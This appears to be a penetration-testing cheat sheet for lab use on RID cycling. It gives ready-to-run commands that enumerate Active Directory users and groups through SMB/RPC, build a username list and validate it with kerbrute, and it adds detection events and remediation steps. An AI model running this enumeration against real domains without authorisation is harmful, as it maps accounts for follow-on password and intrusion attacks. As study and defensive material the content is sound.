RID cycling enumerates domain users and groups by asking the domain to resolve sequential SIDs.
It is useful when direct user listing is blocked but SMB/RPC still allows name lookups.
Fast Path
lookupsid.py 'OOTW/Guest:@10.10.10.200'
nxc smb 10.10.10.200 -u 'guest' -p '' --rid-brute
enum4linux-ng -R 500-3000 10.10.10.200
If Guest is blocked, try with a known low-privileged credential:
nxc smb 10.10.10.200 -d ootw.local -u alice.wright -p 'StudentPass2026!' --rid-brute
Manual RPC Method
Get the domain SID:
rpcclient 10.10.10.200 -U 'guest%' -c 'lsaquery'
Set it:
export SID='S-1-5-21-REPLACE-ME'
Cycle common RID ranges:
for RID in $(seq 500 2000); do
rpcclient 10.10.10.200 -U 'guest%' -c "lookupsids $SID-$RID"
done | tee rid-raw.txt
Extract names:
grep -v 'unknown' rid-raw.txt | tee rid-found.txt
What RIDs Mean
Common values:
500 built-in Administrator
501 Guest
502 krbtgt
512 Domain Admins
513 Domain Users
514 Domain Guests
515 Domain Computers
Custom users and groups usually appear above 1000.
Build A User List
Convert RID output into a clean username list:
grep -E 'SidTypeUser|User' rid-found.txt |
awk -F'\\\\' '{print $2}' |
awk '{print $1}' |
tr '[:upper:]' '[:lower:]' |
sort -u > users.txt
Validate with Kerberos:
kerbrute userenum -d ootw.local --dc 10.10.10.200 users.txt -o kerbrute-users.txt
Detection
Defenders look for:
- repeated SAMR or LSARPC lookups
- SMB/RPC traffic to the DC from unusual hosts
- Security 4661 and 4662 when object access auditing is enabled
- Security 4776 for NTLM authentication around enumeration
- tool execution such as rpcclient, enum4linux, lookupsid, or NetExec
Remediation
- restrict anonymous SMB/RPC enumeration
- disable Guest access
- monitor sequential RID lookup patterns
- restrict SMB access to DCs from unmanaged networks
- alert on enumeration tooling from workstations